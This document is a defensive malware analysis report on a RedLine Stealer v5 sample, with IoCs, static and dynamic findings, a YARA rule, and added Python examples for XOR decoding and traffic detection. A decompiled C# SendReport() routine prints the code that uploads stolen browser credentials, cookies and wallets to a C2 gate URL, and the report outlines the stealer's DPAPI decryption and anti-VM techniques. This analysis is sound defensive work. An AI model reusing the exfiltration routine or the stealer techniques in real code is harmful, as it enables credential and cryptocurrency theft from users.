Indicators of Compromise
- 185.220.101[.]47:80 (C2 address and port)
- hxxp://185.220.101[.]47/gate.php (C2 gate URL)
- RDL_MUTEX_5Xk2pQ (mutex)
- update-service[.]pro (domain)
Executive Summary
RedLine Stealer v5 is a commodity credential-harvesting malware distributed through malvertising campaigns promoting fake software installers (notably cracked games and productivity tools). Upon execution, it extracts browser-saved passwords, cookies, cryptocurrency wallets, and Discord tokens before exfiltrating them to a C2 panel. This sample was built using the leaked RedLine builder and sold as MaaS (Malware-as-a-Service).
Sample Information
| Field | Value |
|---|---|
| File Name | AdobeInstaller_crack.exe |
| File Type | PE32 executable (GUI) |
| Size | 612 KB |
| Compiler | .NET 4.8 |
| Packer | ConfuserEx (obfuscation) |
| First Seen | 2025-03-10 (VirusTotal) |
| VT Score | 47 / 72 |
Static Analysis
DIE (Detect-It-Easy) identified the sample as a .NET assembly with ConfuserEx obfuscation applied. PE-bear showed no obvious packing, but the import table was minimal, which is consistent with .NET managed code.
Running strings revealed several interesting artifacts after de-obfuscating with de4dot:
```text
gate.php
RDL_MUTEX_5Xk2pQ
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SELECT * FROM Win32_ComputerSystem
SELECT * FROM Win32_VideoController
\Google\Chrome\User Data\Default\Login Data
\Mozilla\Firefox\Profiles\
wallet.dat
```
The C2 URL was stored XOR-encoded with key 0x4A and decoded at runtime.
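The following Python is an added example, not code from the report or from the sample, showing how an analyst recovers such a string: it decodes with the reported key 0x4A, and it also goes beyond the single-key case by brute-forcing the key when it is unknown, accepting the first candidate that decodes to a printable URL. The input blob is constructed here by XOR-encoding the page's defanged C2 URL.

```python
# Added example (not from the report): recover a single-byte XOR-encoded
# configuration string such as the C2 URL described in the static analysis.
from typing import Optional

XOR_KEY = 0x4A  # key reported for this sample


def xor_decode(data: bytes, key: int) -> bytes:
    """Undo a single-byte XOR (XOR is its own inverse, so this also encodes)."""
    return bytes(b ^ key for b in data)


def recover_url(blob: bytes, candidate_keys=range(256)) -> Optional[tuple[int, str]]:
    """Brute-force the key when it is unknown: try every byte value and
    return (key, text) for the first decoding that is printable ASCII and
    starts like a URL. Returns None when no candidate looks like a URL."""
    for key in candidate_keys:
        out = xor_decode(blob, key)
        try:
            text = out.decode("ascii")
        except UnicodeDecodeError:
            continue
        if text.isprintable() and text.startswith(("http://", "https://")):
            return key, text
    return None


# Constructed sample: the report's defanged C2 URL, XOR-encoded with 0x4A,
# standing in for the blob an analyst would carve out of the binary.
SAMPLE_BLOB = xor_decode(b"http://185.220.101[.]47/gate.php", XOR_KEY)

if __name__ == "__main__":
    print(xor_decode(SAMPLE_BLOB, XOR_KEY).decode())
    print(recover_url(SAMPLE_BLOB))
```

Because XOR is its own inverse, only the true key turns the first bytes back into "http", so the brute force stops at 0x4A; on a real blob the URL-prefix check is what keeps random printable decodings from being accepted.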
Dynamic Analysis
Executed inside a Windows 10 VM with FakeNet-NG intercepting traffic and Procmon logging all activity.
Filesystem Activity
- Copied itself to %APPDATA%\WindowsServices\svchost32.exe
- Queried and staged browser databases to %TEMP%\RDL_tmp\
- Deleted the temp folder after successful exfiltration
Registry Activity
- Created persistence value: HKCU\Software\Microsoft\Windows\CurrentVersion\Run → svchost32
Network Activity
After a 3-second sleep (likely sandbox evasion), the sample sent an HTTP POST to 185.220.101[.]47/gate.php with a zipped payload containing:
- passwords.txt — browser credentials
- cookies.json — session cookies
- system_info.txt — hostname, GPU, installed AV
- wallets/ — any .dat files found
Traffic was unencrypted HTTP, making it easy to inspect with Wireshark.
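As an added example (not code from the report), the following Python flags the beacon pattern described above and in the decompiled SendReport() routine: a POST to /gate.php on the known C2 host, the bare "Mozilla/5.0" User-Agent, and a ZIP archive in the body. It is the same logic a Snort rule on the method, URI and body content would express. The captured request is constructed here; it omits the multipart/form-data wrapper that WebClient.UploadFile would normally add around the file, which does not affect the ZIP-magic check.

```python
# Added example (not from the report): detect the RedLine v5 exfiltration
# request in a plaintext HTTP capture.
import io
import zipfile

C2_HOST = "185.220.101.47"   # report IoC, with the defanging brackets removed
C2_PATH = "/gate.php"


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def is_redline_beacon(raw: bytes) -> list[str]:
    """Return the reasons a request matches the exfil pattern; an empty
    list means no match."""
    method, path, headers, body = parse_http_request(raw)
    reasons = []
    if method == "POST" and path == C2_PATH:
        reasons.append("POST to gate.php")
    if headers.get("host", "").split(":")[0] == C2_HOST:
        reasons.append("known C2 host")
    # The decompiled SendReport() sets a bare 'Mozilla/5.0' User-Agent,
    # which no real browser sends without a platform/engine suffix.
    if headers.get("user-agent") == "Mozilla/5.0":
        reasons.append("bare Mozilla/5.0 User-Agent")
    if b"PK\x03\x04" in body:   # ZIP local file header magic
        reasons.append("ZIP archive in body")
    return reasons


def build_sample_request() -> bytes:
    """Constructed sample traffic: a ZIP carrying the file names from the
    report, posted the way SendReport() would (multipart wrapper omitted)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("passwords.txt", "constructed placeholder\n")
        z.writestr("system_info.txt", "hostname=LAB-VM\n")
    payload = buf.getvalue()
    head = (
        f"POST {C2_PATH} HTTP/1.1\r\n"
        f"Host: {C2_HOST}\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        f"Content-Length: {len(payload)}\r\n\r\n"
    )
    return head.encode() + payload


if __name__ == "__main__":
    print(is_redline_beacon(build_sample_request()))
```

Each reason is independent on purpose: once the C2 address changes, the bare User-Agent and the ZIP-in-POST shape still give a detection, which is what the conclusion means by the plaintext channel being an operational security failure.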
Code Analysis
After de-obfuscating with de4dot, the main stealer logic was clear. Key functions:
- Browser credential extraction — uses SQLite to directly query Login Data from Chromium-based browsers. Passwords are decrypted using CryptUnprotectData (DPAPI).
- Crypto wallet scan — enumerates %APPDATA% for known wallet paths (Exodus, Electrum, MetaMask extension storage).
- Anti-analysis checks — checks the GetTickCount() delta and the presence of common VM artifacts (VBOX registry keys, vmtoolsd.exe process).
```csharp
// Decompiled: C2 communication (URL shown defanged)
private static void SendReport(string zipPath)
{
    var client = new WebClient();
    client.Headers.Add("User-Agent", "Mozilla/5.0");
    client.UploadFile("http://185.220.101[.]47/gate.php", zipPath);
}
```
YARA Rule
```yara
rule RedLine_v5_ConfuserEx {
    meta:
        description = "Detects RedLine Stealer v5 with ConfuserEx obfuscation"
        author = "analyst.lab"
        date = "2025-03-18"
        severity = "critical"
    strings:
        $mutex = "RDL_MUTEX_" ascii wide
        $gate = "gate.php" ascii wide
        $tmp_dir = "RDL_tmp" ascii wide
        $confuse = { 72 2A 00 00 70 } // ConfuserEx runtime marker
    condition:
        uint16(0) == 0x5A4D and
        2 of ($mutex, $gate, $tmp_dir) and
        $confuse
}
```
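To make the rule's behaviour concrete, here is an added Python example (not from the report) that reproduces its condition over constructed buffers: the MZ check via a little-endian uint16, the "2 of" string count, and the hex marker. It shows why the `ascii wide` modifier matters for a .NET sample, whose user strings are stored as UTF-16LE. The buffers are constructed stand-ins, not the real binary.

```python
# Added example (not from the report): the YARA rule's matching logic in
# plain Python, applied to constructed byte buffers.
KEYWORDS = [b"RDL_MUTEX_", b"gate.php", b"RDL_tmp"]      # $mutex, $gate, $tmp_dir
CONFUSER_MARKER = bytes.fromhex("722A000070")             # $confuse hex string


def wide(s: bytes) -> bytes:
    """UTF-16LE form of an ASCII string: what the 'wide' modifier matches,
    and how .NET stores user strings in the #US heap."""
    return s.decode("ascii").encode("utf-16-le")


def count_keyword_hits(data: bytes) -> int:
    """Number of the three strings present in either ascii or wide form."""
    return sum(1 for k in KEYWORDS if k in data or wide(k) in data)


def matches_rule(data: bytes) -> bool:
    """Same condition as the rule: MZ header, at least 2 of 3 strings,
    and the ConfuserEx marker bytes."""
    is_mz = len(data) >= 2 and int.from_bytes(data[:2], "little") == 0x5A4D
    return is_mz and count_keyword_hits(data) >= 2 and CONFUSER_MARKER in data


def make_sample(strings_wide: bool, with_marker: bool = True) -> bytes:
    """Constructed stand-in for a PE: MZ header, padding, the strings in
    either ascii or UTF-16LE form, and optionally the marker bytes."""
    body = b"MZ" + b"\x00" * 62
    for k in KEYWORDS:
        body += (wide(k) if strings_wide else k) + b"\x00\x00"
    if with_marker:
        body += CONFUSER_MARKER
    return body


if __name__ == "__main__":
    for wide_strings in (False, True):
        print("wide" if wide_strings else "ascii", matches_rule(make_sample(wide_strings)))
```

Had the rule used plain `ascii` strings, the wide-only buffer would fail the "2 of" clause even though every string is present, which is the usual reason .NET stealer rules carry both modifiers.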
Conclusion
This RedLine v5 sample is a textbook commodity stealer — cheap to deploy, effective against average users, and trivial for defenders to detect once signatures exist. The ConfuserEx obfuscation is superficial and de4dot removes it completely. The unencrypted C2 channel is an operational security failure that makes traffic detection straightforward with a simple Snort rule.
The use of fake Adobe installers as a delivery vector points to a low-sophistication threat actor targeting home users, gamers, and piracy communities.